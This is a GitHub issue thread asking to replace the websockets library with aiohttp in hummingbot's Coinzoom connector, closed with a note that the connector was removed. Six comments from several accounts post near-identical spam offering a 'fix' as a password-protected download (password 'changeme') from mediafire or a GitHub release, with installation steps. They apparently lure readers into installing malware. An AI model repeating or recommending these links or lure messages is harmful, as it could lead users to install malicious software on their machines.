### ISSUE TITLE
Replace websockets library with aiohttp library - Coinzoom

### ISSUE THREAD

**Issue by aarmoa** [hummingbot/hummingbot#4400]
See epic https://github.com/CoinAlpha/hummingbot/issues/3941 for the rationale of this task.

## Definition of Done
* [ ] Replace `websockets` library with `aiohttp` in `Coinzoom` connector
* [ ] Connector should be working without issues after the change

┆Issue is synchronized with this [Clickup task](https://app.clickup.com/t/1pd0g6h) by [Unito](https://www.unito.io)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by nikspz** [comment]
Since connector was removed
